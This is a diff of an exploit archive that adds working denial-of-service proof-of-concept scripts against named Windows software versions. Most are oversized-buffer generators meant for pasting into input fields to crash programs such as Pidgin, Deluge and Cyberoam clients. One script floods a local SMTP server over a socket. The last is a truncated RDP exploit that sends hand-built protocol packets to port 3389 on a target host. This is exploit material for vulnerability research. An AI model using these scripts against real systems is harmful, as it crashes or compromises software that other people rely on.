+progid     = "eSpaceStatusCtrlLib.StatusCtrl"
+argCount   = 4
+arg1="defaultV"
+arg2="defaultV"
+arg3=String(14356, "A")
+arg4=1
+target.SetUserInfo arg1 ,arg2 ,arg3 ,arg4 
+
+0:005> r
+eax=feeefeee ebx=02813550 ecx=feeefeee edx=feeefeee esi=0281369c edi=02813698
+eip=776def10 esp=029dfd60 ebp=029dfd74 iopl=0         nv up ei ng nz ac po cy
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010293
+ntdll!RtlEnterCriticalSection+0x4a:
+776def10 83790800        cmp     dword ptr [ecx+8],0  ds:0023:feeefef6=????????
\ No newline at end of file
diff --git a/exploits/windows/dos/46871.py b/exploits/windows/dos/46871.py
new file mode 100755
index 000000000..bb8c14bbe
--- /dev/null
+++ b/exploits/windows/dos/46871.py
@@ -0,0 +1,21 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Encrypt PDF v2.3 - Denial of Service (PoC)
+# Date: 19/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.verypdf.com
+# Software: http://www.verypdf.com/encryptpdf/encryptpdf.exe
+# Version: 2.3
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "EncryptPDF.py", it will create a new file "EncryptPDF.txt"
+# 2.- Copy the text from the generated EncryptPDF.txt file to clipboard
+# 3.- Open Encrypt PDF v2.3
+# 4.- Go to 'Setting', paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'
+# 5.- Click on 'Open PDF(s)', when you import a pdf file, you will see a crash
+
+buffer = "\x41" * 1000
+
+f = open ("EncryptPDF.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46872.py b/exploits/windows/dos/46872.py
new file mode 100755
index 000000000..c9cc115b1
--- /dev/null
+++ b/exploits/windows/dos/46872.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: VeryPDF PCL Converter v2.7 - Denial of Service (PoC)
+# Date: 19/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.verypdf.com
+# Software: http://www.verypdf.com/pcltools/pcl-converter.exe
+# Version: 2.7
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "PCLConverter.py", it will create a new file "PCLConverter.txt"
+# 2.- Copy the text from the generated PCLConverter.txt file to clipboard
+# 3.- Open VeryPDF PCL Converter v2.7 
+# 4.- Go to 'Setting' > 'PDF Security'
+# 5.- Mark 'Encrypt PDF File' and paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'
+# 6.- Click on 'Add File(s)', and select a pcl file, e.g. 'sample.pcl'
+# 7.- Click on 'Start', you will see a crash
+
+buffer = "\x41" * 3000
+f = open ("PCLConverter.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46873.py b/exploits/windows/dos/46873.py
new file mode 100755
index 000000000..bd86a42c8
--- /dev/null
+++ b/exploits/windows/dos/46873.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Document Converter (docPrint Pro) v8.0 - Denial of Service (PoC)
+# Date: 19/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.verypdf.com
+# Software: http://dl.verypdf.net/docprint_pro_setup.exe
+# Version: 8.0
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "DocConverter.py", it will create a new file "DocConverter.txt"
+# 2.- Copy the text from the generated DocConverterr.txt file to clipboard
+# 3.- Open docPrint Document Converter
+# 4.- Go to 'Setting' > 'PDF Security'
+# 5.- Mark 'Encrypt PDF File' and paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'
+# 6.- Click on 'Add File(s)', and select a supported file, e.g. 'sample.doc'
+# 7.- Click on 'Start', you will see a crash
+
+buffer = "\x41" * 3000
+f = open ("DocConverter.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46874.py b/exploits/windows/dos/46874.py
new file mode 100755
index 000000000..658dc557a
--- /dev/null
+++ b/exploits/windows/dos/46874.py
@@ -0,0 +1,21 @@
+#Exploit Title: AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-19
+#Vendor Homepage: https://www.celestialsoftware.net/
+#Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet10.16.exe
+#Tested Version: 10.16
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: AbsoluteTelent.py
+#2.- Open AbsoluteTelent.txt and copy content to clipboard
+#3.- Open AbsoluteTelnet.exe
+#4.- Select "Help" > "Enter License Key"
+#5.- In "License Name" paste Clipboard
+#6.- Crashed
+
+cod = "\x41" * 2500
+
+f = open('AbsoluteTelent.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46875.py b/exploits/windows/dos/46875.py
new file mode 100755
index 000000000..cb4361dd7
--- /dev/null
+++ b/exploits/windows/dos/46875.py
@@ -0,0 +1,22 @@
+#Exploit Title: BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-18
+#Vendor Homepage: http://bpftpserver.com/
+#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download
+#Tested Version: 2019.0.0.50
+#Tested on: Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: BulletProof_DNS_Server_2019.0.0.50.py
+#2.- Open bullet_storage.txt and copy content to clipboard
+#3.- Open BulletProof FTP Server
+#4.- Select "Settings" > "Protocols" > "FTP" > "Firewall"
+#5.- Enable "DNS Address" and Paste Clipboard
+#6.- Click on "Test"
+#7.- Crashed
+
+cod = "\x41" * 700
+
+f = open('bullet_dns.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46876.py b/exploits/windows/dos/46876.py
new file mode 100755
index 000000000..5632cefd9
--- /dev/null
+++ b/exploits/windows/dos/46876.py
@@ -0,0 +1,22 @@
+#Exploit Title: BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-18
+#Vendor Homepage: http://bpftpserver.com/
+#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download
+#Tested Version: 2019.0.0.50
+#Tested on: Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: BulletProof_Storage_Server_2019.0.0.50.py
+#2.- Open bullet_storage.txt and copy content to clipboard
+#3.- Open BulletProof FTP Server
+#4.- Select "Settings" > "Advanced"
+#5.- Enable "Override Storage-Path" and Paste Clipboard
+#6.- Click on "Save"
+#7.- Crashed
+
+cod = "\x41" * 500
+
+f = open('bullet_storage.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46884.py b/exploits/windows/dos/46884.py
new file mode 100755
index 000000000..0f63893aa
--- /dev/null
+++ b/exploits/windows/dos/46884.py
@@ -0,0 +1,21 @@
+#Exploit Title: Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-20
+#Vendor Homepage: https://dev.deluge-torrent.org/
+#Software Link: http://download.deluge-torrent.org/windows/deluge-1.3.15-win32-py2.7.exe
+#Tested Version: 1.3.15
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: deluge_web.py
+#2.- Open deluge_web.txt and copy content to clipboard
+#3.- Open deluge.exe
+#4.- Select "File" > "Create Torrent" 
+#5.- In "Webseeds" field paste Clipboard
+#6.- Crashed
+
+cod = "\x41" * 5000
+
+f = open('deluge_web.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46893.py b/exploits/windows/dos/46893.py
new file mode 100755
index 000000000..23dae431a
--- /dev/null
+++ b/exploits/windows/dos/46893.py
@@ -0,0 +1,21 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: BlueStacks 4.80.0.1060 - Denial of Service (PoC)
+# Date: 21/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://www.bluestacks.com
+# Software: https://www.bluestacks.com/download.html?utm_campaign=bluestacks-4-en
+# Version: 4.80.0.1060
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script 'Bluestacks.py', it will create a new file 'exploit.txt'
+# 2.- Copy the text from the generated exploit.txt file to clipboard
+# 3.- Open BlueStacks
+# 4.- Paste clipboard in the search field and click on the search button
+# 5.- Crashed
+
+buffer = "\x41" * 100000
+
+f = open ("exploit.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46899.txt b/exploits/windows/dos/46899.txt
new file mode 100644
index 000000000..732f7647c
--- /dev/null
+++ b/exploits/windows/dos/46899.txt
@@ -0,0 +1,22 @@
+#Exploit Title: RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-21
+#Vendor Homepage: http://www.raimersoft.com/
+#Software Link: www.raimersoft.com/downloads/rarmaradio_setup.exe
+#Tested Version: 2.72.3
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: rarmaradio_server.py
+#2.- Open rarma_ser.txt and copy content to clipboard
+#3.- Open RarmaRadio
+#4.- Select "Edit" > "Settings" > "Network"
+#5.- In "Server" field paste Clipboard
+#6.- Select "OK"
+#7.- Crashed
+
+cod = "\x41" * 4000
+
+f = open('rarma_ser.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46900.txt b/exploits/windows/dos/46900.txt
new file mode 100644
index 000000000..e120b2123
--- /dev/null
+++ b/exploits/windows/dos/46900.txt
@@ -0,0 +1,22 @@
+#Exploit Title: RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-21
+#Vendor Homepage: http://www.raimersoft.com/
+#Software Link: www.raimersoft.com/downloads/rarmaradio_setup.exe
+#Tested Version: 2.72.3
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: rarmaradio_username.py
+#2.- Open rarma_user.txt and copy content to clipboard
+#3.- Open RarmaRadio
+#4.- Select "Edit" > "Settings" > "Network"
+#5.- In "Username" field paste Clipboard
+#6.- Select "OK"
+#7.- Crashed
+
+cod = "\x41" * 5000
+
+f = open('rarma_user.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46901.py b/exploits/windows/dos/46901.py
new file mode 100755
index 000000000..5cb983e1b
--- /dev/null
+++ b/exploits/windows/dos/46901.py
@@ -0,0 +1,23 @@
+#Exploit Title: TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-21
+#Vendor Homepage: http://www.raimersoft.com/
+#Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
+#Tested Version: 2.11.6
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: tapinadio_address.py
+#2.- Open tapin_add.txt and copy content to clipboard
+#3.- Open TapinRadio
+#4.- Select "Settings" > "Preferences" > "Miscellaneous"
+#5.- Select "Set Application Proxy..."" In "Address" field paste Clipboard
+#6.- In Port type "444" > "Username" type "test" > Password type "1234"
+#7.- Select "OK" and "OK"
+#8.- Crashed
+
+cod = "\x41" * 3000
+	
+f = open('tapin_add.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46902.py b/exploits/windows/dos/46902.py
new file mode 100755
index 000000000..446eb3880
--- /dev/null
+++ b/exploits/windows/dos/46902.py
@@ -0,0 +1,23 @@
+#Exploit Title: TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-21
+#Vendor Homepage: http://www.raimersoft.com/
+#Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
+#Tested Version: 2.11.6
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: tapinadio_user.py
+#2.- Open tapin_user.txt and copy content to clipboard
+#3.- Open TapinRadio
+#4.- Select "Settings" > "Preferences" > "Miscellaneous"
+#5.- Select "Set Application Proxy..."" In "Username" field paste Clipboard
+#6.- In Server type "1.1.1.1" > Port type 444  > Password type "1234"
+#7.- Select "OK" and "OK"
+#8.- Crashed
+
+cod = "\x41" * 10000
+	
+f = open('tapin_user.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46908.py b/exploits/windows/dos/46908.py
new file mode 100755
index 000000000..21f8b138d
--- /dev/null
+++ b/exploits/windows/dos/46908.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: NetAware 1.20 - 'Add Block' Denial of Service (PoC)
+# Date: 22/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://www.infiltration-systems.com
+# Software: http://www.infiltration-systems.com/Files/netaware.zip
+# Version: 1.20
+# Tested on: Windows 7
+
+# Proof of Concept:
+# 1.- Run the python script 'NetAware.py', it will create a new file 'NetAware.txt'
+# 2.- Copy the text from the generated NetAware.txt file to clipboard
+# 3.- Open NetAware 
+# 4.- Go to 'Settings' > 'User Blocking'
+# 5.- Click 'Add Block', paste clipboard in the field 'Add a website or keyword to be filtered...' and click 'OK'
+# 6.- Select the block created and click 'Remove', you will see a crash
+
+buffer = "\x41" * 512
+
+f = open ("NetAware.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46909.py b/exploits/windows/dos/46909.py
new file mode 100755
index 000000000..a2fcc5fbc
--- /dev/null
+++ b/exploits/windows/dos/46909.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: NetAware 1.20 - 'Share Name' Denial of Service (PoC)
+# Date: 22/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://www.infiltration-systems.com
+# Software: http://www.infiltration-systems.com/Files/netaware.zip
+# Version: 1.20
+# Tested on: Windows 7
+
+# Proof of Concept:
+# 1.- Run the python script 'NetAware_share.py', it will create a new file 'NetAware.txt'
+# 2.- Copy the text from the generated NetAware.txt file to clipboard
+# 3.- Open NetAware 
+# 4.- Click 'Manage Shares' > 'Add a New Share...'
+# 5.- Paste clipboard in the field 'Share Name', in the field 'Share Path' write anything, e.g. test and the field 'User Limit' select Maximum allowed
+# 6.- Click 'Ok', you will see a crash
+
+buffer = "\x41" * 1000
+
+f = open ("NetAware.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46911.py b/exploits/windows/dos/46911.py
new file mode 100755
index 000000000..0221567f2
--- /dev/null
+++ b/exploits/windows/dos/46911.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Terminal Services Manager 3.2.1 - Local Buffer Overflow Denial of Service
+# Date: 22/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://lizardsystems.com
+# Software: https://lizardsystems.com/files/releases/terminal-services-manager/tsmanager_setup_3.2.1.247.exe
+# Version: 3.2.1 (Build 247)
+# Tested on: Windows 10
+
+# Steps to produce the crash:
+# 1.- Run the python script 'tsmanager.py', it will create a new file 'evil.txt'
+# 2.- Open Terminal Services Manager
+# 3.- Click 'Add computer'
+# 4.- Now paste the content of evil.txt into the field: 'Computer name or IP address' and click 'OK'
+# 5.- In the 'List' tab select the computer created.
+# 6.- Now in the 'Servers' tab double click on the created computer, wait and you will see a crash! 
+
+buffer = "\x41" * 5000
+
+f = open ("evil.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46923.py b/exploits/windows/dos/46923.py
new file mode 100755
index 000000000..908fa50aa
--- /dev/null
+++ b/exploits/windows/dos/46923.py
@@ -0,0 +1,23 @@
+#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-23
+#Vendor Homepage: https://www.cyberoam.com
+#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip
+#Tested Version: 1.3.1.30
+#Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: c_sslvpn_cts.py
+#2.- Open c_sslvpn_cts.txt and copy content to clipboard
+#3.- Open Cyberoam SSLVPN Client
+#4.- Select Server Settings 
+#5.- In "Connect To Server" field paste Clipboard
+#6.- In "Port" type 80
+#7.- Select "OK"
+#8.- Crashed! 
+
+cod = "\x41" * 5000
+
+f = open('c_sslvpn_cts.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46924.py b/exploits/windows/dos/46924.py
new file mode 100755
index 000000000..bb3d7682a
--- /dev/null
+++ b/exploits/windows/dos/46924.py
@@ -0,0 +1,23 @@
+#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-23
+#Vendor Homepage: https://www.cyberoam.com
+#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip
+#Tested Version: 1.3.1.30
+#Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: c_sslvpn_http.py
+#2.- Open c_sslvpn_http.txt and copy content to clipboard
+#3.- Open Cyberoam SSLVPN Client
+#4.- Select Proxy Settings > Enable "Manual Configuration"
+#5.- In "HTTP Proxy" address field paste Clipboard
+#6.- In "Port" type 80
+#7.- Select "OK"
+#8.- Crashed! 
+
+cod = "\x41" * 5000
+
+f = open('c_sslvpn_http.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46925.py b/exploits/windows/dos/46925.py
new file mode 100755
index 000000000..07611c659
--- /dev/null
+++ b/exploits/windows/dos/46925.py
@@ -0,0 +1,22 @@
+#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-23
+#Vendor Homepage: https://www.cyberoam.com
+#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip
+#Tested Version: 2.1.2.5
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: ctas_fqdn_2.1.2.5.py
+#2.- Open ctas_fqdn_2.1.2.5.txt and copy content to clipboard
+#3.- Open Cyberoam Transparent Authentication Suite
+#4.- Select General > in Domain Type select "Microsoft Active Directory"
+#5.- In "Fully Qualified Domain Name" paste Clipboard
+#6.- Click on "Apply"
+#7.- Crashed! 
+
+cod = "\x41" * 1000
+
+f = open('ctas_fqdn_2.1.2.5.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46926.py b/exploits/windows/dos/46926.py
new file mode 100755
index 000000000..6f0866e52
--- /dev/null
+++ b/exploits/windows/dos/46926.py
@@ -0,0 +1,22 @@
+#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-23
+#Vendor Homepage: https://www.cyberoam.com
+#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip
+#Tested Version: 2.1.2.5
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: ctas_nn_2.1.2.5.py
+#2.- Open ctas_nn_2.1.2.5.txt and copy content to clipboard
+#3.- Open Cyberoam Transparent Authentication Suite
+#4.- Select General > in Domain Type select "Microsoft Active Directory"
+#5.- In "NetBIOS Name" Paste Clipboard
+#6.- Click on "Apply"
+#7.- Crashed! 
+
+cod = "\x41" * 1500
+
+f = open('ctas_nn_2.1.2.5.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46927.py b/exploits/windows/dos/46927.py
new file mode 100755
index 000000000..bae1436b3
--- /dev/null
+++ b/exploits/windows/dos/46927.py
@@ -0,0 +1,21 @@
+#Exploit Title: Cyberoam General Authentication Client 2.1.2.7 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-23
+#Vendor Homepage: https://www.cyberoam.com
+#Software Link: https://download.cyberoam.com/solution/optionals/i18n/Cyberoam%20General%20Authentication%20Client%202.1.2.7.zip
+#Tested Version: 2.1.2.7
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: cgac_2.1.2.7.py
+#2.- Open cgac_2.1.2.7.txt and copy content to clipboard
+#3.- Open Cyberoam General Authentication Client
+#4.- In "Server Address" field paste Clipboard
+#5.- Click on "Test"
+#6.- Crashed! 
+
+cod = "\x41" * 256
+
+f = open('cgac_2.1.2.7.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46929.py b/exploits/windows/dos/46929.py
new file mode 100755
index 000000000..83d1f3c3f
--- /dev/null
+++ b/exploits/windows/dos/46929.py
@@ -0,0 +1,29 @@
+# Exploit Title: Fast AVI MPEG Joiner Dos Exploit
+# Date: 24.5.2019
+# Vendor Homepage:http://www.alloksoft.com
+# Software Link:  http://www.alloksoft.com/fast_avimpegjoiner.exe
+# Exploit Author: Achilles
+# Tested Version: 1.2.0812
+# Tested on: Windows 7 x64 Sp1
+#            Windows XP x86 Sp3
+
+
+# 1.- Run python code :Joiner.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open Fast AVI MPEG Joiner.exe
+# 4.- Paste the content of EVIL.txt into the Field: 'License Name'
+# 5.- Click 'Register'and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/46930.py b/exploits/windows/dos/46930.py
new file mode 100755
index 000000000..276cc1086
--- /dev/null
+++ b/exploits/windows/dos/46930.py
@@ -0,0 +1,23 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Pidgin 2.13.0 - Denial of Service (PoC)
+# Date: 24/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://pidgin.im/
+# Software https://cfhcable.dl.sourceforge.net/project/pidgin/Pidgin/2.13.0/pidgin-2.13.0.exe
+# Version: 2.13.0
+# Tested on: Windows 7, Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script 'pidgin.py', it will create a new file 'pidgin.txt'
+# 2.- Open Pidgin
+# 3.- Go to 'Accounts' > 'Manage Accounts'
+# 4.- Click 'Add...', paste the content of pidgin.txt into the field 'Username', 
+#     into the field 'Password' write anything, e.g. 1234 and click 'Add'
+# 5.- On the taskbar, click show hidden icons, right click on Pingin and select 'Join Chat...'
+# 6.- Now click 'Join' and crashed
+
+buffer = "\x41" * 1000
+
+f = open ("pidgin.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46937.py b/exploits/windows/dos/46937.py
new file mode 100755
index 000000000..c6f7e6027
--- /dev/null
+++ b/exploits/windows/dos/46937.py
@@ -0,0 +1,24 @@
+#Exploit Title: Free SMTP Server - Local Denial of Service Crash (PoC)
+# Date: February 3, 2009
+# Exploit Author: Metin Kandemir (kandemir)
+# Vendor Homepage: http://www.softstack.com/freesmtp.html
+# Software Link: https://free-smtp-server.en.uptodown.com/windows/download
+# Version: 2.5
+# Tested on: Windows 7 Service Pack 1 x64
+# Software Description : Free SMTP server program to send emails directly from PC.
+# ==================================================================
+# The SMTP Server will crash when this code is run on localhost. 
+
+import socket
+
+a=1
+buffer = ["A"]
+while a <= 20000:
+        a = a+1
+        buffer.append("A"*a)
+
+
+for string in buffer:
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        connect =  s.connect(('127.0.0.1',25))
+        s.send(string)
\ No newline at end of file
diff --git a/exploits/windows/dos/46946.py b/exploits/windows/dos/46946.py
new file mode 100755
index 000000000..97cf56f3d
--- /dev/null
+++ b/exploits/windows/dos/46946.py
@@ -0,0 +1,198 @@
+import socket, sys, struct
+from OpenSSL import SSL
+from impacket.structure import Structure
+
+# I'm not responsible for what you use this to accomplish and should only be used for education purposes
+
+# Could clean these up since I don't even use them
+class TPKT(Structure):
+	commonHdr = (
+		('Version','B=3'),
+		('Reserved','B=0'),
+		('Length','>H=len(TPDU)+4'),
+		('_TPDU','_-TPDU','self["Length"]-4'),
+		('TPDU',':=""'),
+	)
+
+class TPDU(Structure):
+	commonHdr = (
+		('LengthIndicator','B=len(VariablePart)+1'),
+		('Code','B=0'),
+		('VariablePart',':=""'),
+	)
+	def __init__(self, data = None):
+		Structure.__init__(self,data)
+		self['VariablePart']=''
+
+class CR_TPDU(Structure):
+	commonHdr = (
+		('DST-REF','<H=0'),
+		('SRC-REF','<H=0'),
+		('CLASS-OPTION','B=0'),
+		('Type','B=0'),
+		('Flags','B=0'),
+		('Length','<H=8'),
+	)
+
+class DATA_TPDU(Structure):
+	commonHdr = (
+		('EOT','B=0x80'),
+		('UserData',':=""'),
+	)
+	def __init__(self, data = None):
+		Structure.__init__(self,data)
+		self['UserData'] =''
+
+class RDP_NEG_REQ(CR_TPDU):
+	structure = (
+		('requestedProtocols','<L'),
+	)
+	def __init__(self,data=None):
+		CR_TPDU.__init__(self,data)
+		if data is None:
+			self['Type'] = 1
+
+def send_init_packets(host):
+	tpkt = TPKT()
+	tpdu = TPDU()
+	rdp_neg = RDP_NEG_REQ()
+	rdp_neg['Type'] = 1
+	rdp_neg['requestedProtocols'] = 1
+	tpdu['VariablePart'] = rdp_neg.getData()
+	tpdu['Code'] = 0xe0
+	tpkt['TPDU'] = tpdu.getData()
+	s = socket.socket()
+	s.connect((host, 3389))
+	s.sendall(tpkt.getData())
+	s.recv(8192)
+	ctx = SSL.Context(SSL.TLSv1_METHOD)
+	tls = SSL.Connection(ctx,s)
+	tls.set_connect_state()
+	tls.do_handshake()
+	return tls
+
+# This can be fixed length now buttfuckit
+def send_client_data(tls):
+	p = "\x03\x00\x01\xca\x02\xf0\x80\x7f\x65\x82\x07\xc2\x04\x01\x01\x04\x01\x01\x01\x01\xff\x30\x19\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02\x30\x19\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04\x20\x02\x01\x02\x30\x1c\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02\x04\x82\x01\x61\x00\x05\x00\x14\x7c\x00\x01\x81\x48\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63\x61\x81\x34\x01\xc0\xea\x00\x0a\x00\x08\x00\x80\x07\x38\x04\x01\xca\x03\xaa\x09\x04\x00\x00\xee\x42\x00\x00\x44\x00\x45\x00\x53\x00\x4b\x00\x54\x00\x4f\x00\x50\x00\x2d\x00\x46\x00\x38\x00\x34\x00\x30\x00\x47\x00\x49\x00\x4b\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xca\x01\x00\x00\x00\x00\x00\x18\x00\x0f\x00\xaf\x07\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00\x2d\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00\x39\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d\x00\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42\x07\x00\x01\x00\x00\x00\x56\x02\x00\x00\x50\x01\x00\x00\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x04\xc0\x0c\x00\x15\x00\x00\x00\x00\x00\x00\x00\x02\xc0\x0c\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x03\xc0\x38\x00\x04\x00\x00\x00\x72\x64\x70\x73\x6e\x64\x00\x00\x0f\x00\x00\xc0\x63\x6c\x69\x70\x72\x64\x72\x00\x00\x00\xa0\xc0\x64\x72\x64\x79\x6e\x76\x63\x00\x00\x00\x80\xc0\x4d\x53\x5f\x54\x31\x32\x30\x00\x00\x00\x00\x00"
+	size0 = struct.pack(">h", len(p))
+	size1 = struct.pack(">h", len(p)-12)
+	size2 = struct.pack(">h", len(p)-109)
